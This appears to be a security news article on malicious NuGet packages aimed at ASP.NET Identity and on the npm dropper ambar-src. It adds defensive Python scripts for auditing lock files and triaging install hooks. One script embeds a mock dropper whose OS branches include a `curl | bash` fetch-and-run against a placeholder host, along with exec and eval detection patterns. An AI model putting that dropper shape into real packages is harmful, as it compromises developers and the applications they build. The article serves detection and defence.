The digital landscape is under constant threat, and the software supply chain has emerged as a prime target for sophisticated cyberattacks. Recent revelations by cybersecurity researchers underscore this vulnerability, detailing two distinct but equally alarming campaigns involving malicious NuGet and npm packages designed to compromise developer environments and, ultimately, the applications they build.
ASP.NET Developers Targeted by Malicious NuGet Packages
Socket has unearthed a campaign of four malicious NuGet packages engineered to infiltrate ASP.NET web application development. These packages were not designed merely to steal data; they aimed to establish persistent backdoors, granting attackers long-term access to the applications built with them.
The Modus Operandi: Data Theft and Backdoors
The quartet of rogue packages – NCryptYo, DOMOAuth2_, IRAOAuth2.0, and SimpleWriter_ – were published to the NuGet repository between August 12 and 21, 2024, by a user identified as “hamzazaheer.” Despite being swiftly removed following responsible disclosure, they had already amassed over 4,500 downloads, indicating a significant potential for compromise.
According to Socket’s analysis, the attack unfolds in stages:
- NCryptYo: The Initial Dropper
Masquerading as the legitimate ‘NCrypto’ package, NCryptYo acts as a first-stage dropper. As soon as the assembly is loaded, it establishes a local proxy on localhost:7152 that relays traffic to an attacker-controlled command-and-control (C2) server. Security researcher Kush Pandya elaborated, “NCryptYo is a stage-1 execution-on-load dropper… its static constructor installs JIT compiler hooks that decrypt embedded payloads and deploy a stage-2 binary – a localhost proxy on port 7152.”
- DOMOAuth2_ and IRAOAuth2.0: Identity Theft and Authorization Manipulation
Once the proxy is active, these packages exfiltrate critical ASP.NET Identity data – user accounts, role assignments, and permission mappings – through the local proxy to the external C2 infrastructure. The C2 server then responds with manipulated authorization rules, allowing the threat actor to create persistent backdoors by granting themselves administrative roles, altering access controls, or disabling crucial security checks.
- SimpleWriter_: Unconditional File Operations
This package, deceptively presented as a PDF conversion utility, provides unconditional file writing and hidden process execution capabilities, allowing the attacker to drop and run arbitrary binaries on the compromised system.
Crucially, the campaign’s objective, as explained by Pandya, is not to directly compromise the developer’s machine but to “compromise the applications they build.” By manipulating the authorization layer during development, attackers gain a foothold in deployed production applications, allowing them to continuously exfiltrate data and maintain admin-level access.
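The NuGet packages above were removed from the registry, but a project that restored them before the takedown still carries their IDs in its packages.lock.json. The following script is an added example (not Socket's tooling) that audits such a lock file for the four reported IDs and for look-alike names near packages the team actually trusts, which is the NCryptYo / NCrypto pattern. The lock file content, the trusted-name list and the edit-distance threshold are constructed assumptions to be tuned for a real dependency set.

```python
"""Audit a NuGet packages.lock.json for the package IDs named in the Socket
report and for look-alike IDs close to trusted package names.

Added example, not Socket's tooling. The lock file content below is
constructed for illustration; the trusted-name list and the edit-distance
threshold are assumptions a team would tune for its own dependency set.
"""
import json

# Package IDs reported by Socket (the four malicious NuGet packages).
REPORTED_MALICIOUS = {"NCryptYo", "DOMOAuth2_", "IRAOAuth2.0", "SimpleWriter_"}

# Assumption: packages the team actually intends to depend on.
TRUSTED = {"NCrypto", "Microsoft.AspNetCore.Identity.EntityFrameworkCore", "Newtonsoft.Json"}

# Constructed sample lock file (packages.lock.json layout: "version",
# then "dependencies" keyed by target framework, then by package ID).
SAMPLE_LOCK = json.dumps({
    "version": 1,
    "dependencies": {
        "net8.0": {
            "NCryptYo": {"type": "Direct", "requested": "[1.0.0, )", "resolved": "1.0.0"},
            "Newtonsoft.Json": {"type": "Direct", "requested": "[13.0.3, )", "resolved": "13.0.3"},
            "Microsoft.AspNetCore.Identity.EntityFrameworkCore": {"type": "Transitive", "resolved": "8.0.0"},
            "Serilog": {"type": "Direct", "requested": "[3.1.1, )", "resolved": "3.1.1"},
            "SimpleWriter_": {"type": "Direct", "requested": "[2.1.0, )", "resolved": "2.1.0"},
        }
    },
})


def levenshtein(a: str, b: str) -> int:
    """Edit distance between two strings, compared case-insensitively."""
    a, b = a.lower(), b.lower()
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def package_ids(lock_json: str) -> set[str]:
    """Collect every package ID across all target frameworks in a lock file."""
    data = json.loads(lock_json)
    ids: set[str] = set()
    for framework_deps in data.get("dependencies", {}).values():
        ids.update(framework_deps.keys())
    return ids


def audit_lock(lock_json: str, trusted=TRUSTED, max_distance: int = 2) -> dict[str, str]:
    """Return {package_id: reasons} for packages worth blocking or reviewing.

    A package is flagged if it is one of the reported IDs and/or if it is
    not trusted but sits within `max_distance` edits of a trusted name.
    Untrusted packages that resemble nothing trusted (Serilog here) pass.
    """
    findings: dict[str, str] = {}
    for pid in sorted(package_ids(lock_json)):
        reasons = []
        if pid in REPORTED_MALICIOUS:
            reasons.append("reported malicious (Socket, Aug 2024)")
        if pid not in trusted:
            near = [t for t in sorted(trusted) if levenshtein(pid, t) <= max_distance]
            if near:
                reasons.append(f"look-alike of trusted package {near[0]}")
        if reasons:
            findings[pid] = "; ".join(reasons)
    return findings


if __name__ == "__main__":
    for pid, reason in audit_lock(SAMPLE_LOCK).items():
        print(f"{pid}: {reason}")
```

Lock files only exist when restore is pinned (the `RestorePackagesWithLockFile` MSBuild property); running `dotnet restore --locked-mode` in CI then makes any new or renamed package ID fail the build until someone reviews the lock file diff, which is where a check like this belongs.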
npm’s Ambar-src: A Multi-Platform Malware Dropper
Adding to the growing list of software supply chain threats, Tenable recently detailed a malicious npm package named ambar-src. This package, uploaded on February 13, 2026, garnered over 50,000 downloads before its removal from the JavaScript registry, showcasing the broad reach of such attacks.
Operating System-Specific Payloads
Ambar-src leverages npm’s preinstall script hook to execute malicious code within its index.js during installation. The malware then fetches different payloads from the domain x-ya[.]ru, adapting its attack based on the victim’s operating system:
- Windows: Downloads and executes msinit.exe, which contains encrypted shellcode that is decoded and loaded into memory.
- Linux: Fetches and executes a bash script, which in turn retrieves an ELF binary functioning as an SSH-based reverse shell client.
- macOS: Deploys a script that uses osascript to run JavaScript, dropping Apfell – a JavaScript for Automation (JXA) agent from the Mythic C2 framework. Apfell is capable of extensive reconnaissance, screenshot capture, data theft from Google Chrome, and even system password harvesting via fake prompts.
The attackers behind ambar-src employ multiple evasion techniques and exfiltrate collected data to a Yandex Cloud domain. This choice of infrastructure aims to blend with legitimate traffic, exploiting the trust often afforded to widely used cloud services within corporate networks.
Ambar-src is considered a more advanced iteration of eslint-verify-plugin, another malicious npm package previously identified by JFrog for deploying Mythic agents.
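Because the ambar-src payload runs from a preinstall hook, the cheapest defensive check happens before `npm install` ever executes scripts: unpack the tarball, read package.json for lifecycle hooks, and scan the script they invoke for the primitives a multi-platform dropper needs (platform branching, network fetch, process execution). The script below is an added example, not Tenable's analysis tooling; its package.json and index.js are constructed stand-ins that only mimic the shape described above, not ambar-src's code, and the pattern list is an assumption to extend.

```python
"""Pre-install triage of an npm package: flag lifecycle hooks and, in the
script they run, the primitives a dropper needs (platform branching,
network fetch, process execution, in-memory decode).

Added example, not Tenable's analysis tooling. The package.json and
index.js below are constructed stand-ins, not ambar-src's code.
"""
import json
import re

# npm runs these automatically during `npm install` unless --ignore-scripts is set.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Patterns a practitioner would want to see before letting a hook run (assumed list).
SUSPICIOUS_PATTERNS = {
    "platform-branching": re.compile(r"process\.platform|os\.platform\(\)"),
    "network-fetch": re.compile(r"\bhttps?\.get\(|\bfetch\(|\baxios\b"),
    "process-exec": re.compile(r"child_process|\b(exec|execSync|spawn|spawnSync)\("),
    "osascript": re.compile(r"osascript"),
    "decode-or-eval": re.compile(r"Buffer\.from\([^)]*['\"]base64['\"]\)|\beval\("),
}

# Constructed package manifest wiring a preinstall hook to index.js.
SAMPLE_MANIFEST = json.dumps({
    "name": "example-pkg",
    "version": "1.0.0",
    "scripts": {"preinstall": "node index.js", "test": "echo ok"},
})

# Constructed install script showing the shape described in the article
# (OS-specific branches that fetch and run a payload); not the real sample.
SAMPLE_INDEX_JS = r"""
const os = require('os');
const https = require('https');
const { execSync } = require('child_process');
const base = 'https://example.invalid/';   // placeholder, not the real C2
switch (process.platform) {
  case 'win32':  https.get(base + 'w', r => { /* write and run an exe */ }); break;
  case 'linux':  execSync(`curl -s ${base}l | bash`); break;
  case 'darwin': execSync(`osascript -l JavaScript -e "..."`); break;
}
"""


def lifecycle_scripts(manifest_json: str) -> dict[str, str]:
    """Return the lifecycle hooks a package declares, hook name -> command."""
    scripts = json.loads(manifest_json).get("scripts", {})
    return {h: scripts[h] for h in LIFECYCLE_HOOKS if h in scripts}


def suspicious_primitives(source: str) -> list[str]:
    """Names of SUSPICIOUS_PATTERNS that appear in a script's source."""
    return [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(source)]


def triage(manifest_json: str, source_by_file: dict[str, str]) -> dict:
    """Combine hook detection with a scan of the files those hooks reference.

    `source_by_file` maps filenames to contents (constructed here; in
    practice read from the unpacked tarball before installing).
    """
    hooks = lifecycle_scripts(manifest_json)
    findings = {}
    for hook, cmd in hooks.items():
        referenced = [f for f in source_by_file if f in cmd]
        hits = sorted({p for f in referenced for p in suspicious_primitives(source_by_file[f])})
        findings[hook] = {"command": cmd, "files": referenced, "primitives": hits}
    return {
        "has_hooks": bool(hooks),
        "hooks": findings,
        "block": any(v["primitives"] for v in findings.values()),
    }


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_MANIFEST, {"index.js": SAMPLE_INDEX_JS}), indent=2))
```

The structural point matters more than the pattern list: a hook plus platform branching plus a fetch is the minimal shape of every dropper of this kind, so a package showing all three deserves a human look regardless of what strings it contains. For CI and build agents, `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) removes the execution path entirely, at the cost of having to run the few legitimate install scripts a project depends on by hand.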
The Pervasive Threat to Software Development
These incidents serve as a stark reminder of the escalating risks within the software supply chain. Developers and organizations must remain vigilant: scrutinize third-party dependencies before adding them, pin and review lock files, and treat code that runs at install or assembly-load time with particular suspicion. The compromise of development tools and libraries can have cascading effects, impacting countless production systems and sensitive data.